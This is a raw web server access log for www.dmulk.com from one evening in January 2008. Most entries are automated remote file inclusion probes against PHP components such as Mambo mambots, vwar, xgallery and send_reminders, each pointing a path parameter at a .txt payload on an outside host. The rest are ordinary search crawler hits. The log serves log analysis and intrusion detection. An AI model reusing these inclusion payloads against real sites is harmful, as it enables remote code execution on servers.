161.58.198.111 - - [03/Jan/2008:20:07:55 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:20:07:55 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:20:10:51 -0800] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:20:20:48 -0800] "GET /logs/access_071221.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:20:20:49 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:20:20:49 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:20:25:43 -0800] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:20:25:43 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:20:25:44 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:20:25:55 -0800] "GET /logs/access_071220.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:20:26:46 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:20:35:22 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:20:37:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.110.73.18 - - [03/Jan/2008:20:41:01 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.110.73.18 - - [03/Jan/2008:20:41:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.110.73.18 - - [03/Jan/2008:20:41:05 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.110.73.18 - - [03/Jan/2008:20:41:12 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.110.73.18 - - [03/Jan/2008:20:41:12 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.110.73.18 - - [03/Jan/2008:20:41:12 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:20:42:46 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:20:42:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:20:42:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:20:42:52 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:20:42:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:20:42:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:20:43:27 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:20:43:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:20:43:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:20:43:32 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:20:43:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:20:43:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:20:43:50 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:20:43:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:20:43:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.156.105.11 - - [03/Jan/2008:20:45:38 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [03/Jan/2008:20:45:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [03/Jan/2008:20:45:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.20.125.109 - - [03/Jan/2008:20:51:33 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.125.109 - - [03/Jan/2008:20:51:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.125.109 - - [03/Jan/2008:20:51:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:20:53:46 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:20:53:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:20:54:51 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:20:54:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:20:54:52 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.164.79 - - [03/Jan/2008:20:55:01 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.164.79 - - [03/Jan/2008:20:55:01 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.164.79 - - [03/Jan/2008:20:55:01 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.164.79 - - [03/Jan/2008:20:55:14 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:20:55:30 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:20:55:30 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:20:55:30 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:20:55:35 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:20:55:36 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:20:55:36 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.164.79 - - [03/Jan/2008:20:55:46 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:20:56:04 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:20:56:18 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:20:56:18 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:20:56:29 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:20:56:29 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:20:56:29 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:20:56:30 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:20:56:30 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:20:56:31 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:20:56:33 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.162.1.238 - - [03/Jan/2008:20:58:24 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.162.1.238 - - [03/Jan/2008:20:58:24 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:21:00:11 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:21:00:11 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.94.127 - - [03/Jan/2008:21:05:36 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [03/Jan/2008:21:05:37 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [03/Jan/2008:21:05:37 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [03/Jan/2008:21:08:47 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.23.34 - - [03/Jan/2008:21:12:25 -0800] "GET /logs/config.php?path_to_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.23.34 - - [03/Jan/2008:21:12:25 -0800] "GET /config.php?path_to_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.242.208.120 - - [03/Jan/2008:21:12:52 -0800] "GET //admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.145.197 - - [03/Jan/2008:21:13:34 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.197 - - [03/Jan/2008:21:13:35 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:21:14:12 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:21:14:12 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:21:14:12 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.145.197 - - [03/Jan/2008:21:14:47 -0800] "GET /minamijewelry/source_images/updated1/ HTTP/1.0" 200 1427 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:21:17:36 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.242.208.120 - - [03/Jan/2008:21:18:52 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [03/Jan/2008:21:18:52 -0800] "GET /logs//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.28.145 - - [03/Jan/2008:21:19:05 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.56.50 - - [03/Jan/2008:21:20:18 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.56.50 - - [03/Jan/2008:21:20:18 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.56.50 - - [03/Jan/2008:21:20:18 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.56.50 - - [03/Jan/2008:21:21:15 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.56.50 - - [03/Jan/2008:21:21:15 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.56.50 - - [03/Jan/2008:21:21:15 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:21:21:21 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:21:21:22 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:21:21:22 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.144.235 - - [03/Jan/2008:21:21:51 -0800] "GET /logs/access_071220.log/modules/xfsection/modify.php?dir_module=http://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [03/Jan/2008:21:21:52 -0800] "GET /modules/xfsection/modify.php?dir_module=http://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [03/Jan/2008:21:21:53 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:21:22:26 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.56.146.167 - - [03/Jan/2008:21:22:55 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://89.106.23.150:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
195.56.146.167 - - [03/Jan/2008:21:22:55 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://89.106.23.150:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
128.121.21.39 - - [03/Jan/2008:21:23:13 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
128.121.21.39 - - [03/Jan/2008:21:23:13 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
80.237.144.235 - - [03/Jan/2008:21:26:21 -0800] "GET /contenido/external/frontend/news.php?cfg[path][includes]=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.237.144.235 - - [03/Jan/2008:21:26:21 -0800] "GET /logs/contenido/external/frontend/news.php?cfg[path][includes]=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.246.28.145 - - [03/Jan/2008:21:27:24 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [03/Jan/2008:21:27:24 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [03/Jan/2008:21:28:05 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:21:28:26 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:21:28:26 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:21:28:27 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.35 - - [03/Jan/2008:21:28:31 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.36 - - [03/Jan/2008:21:28:31 -0800] "GET /logs/access_071212.log HTTP/1.0" 200 89527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:21:29:37 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
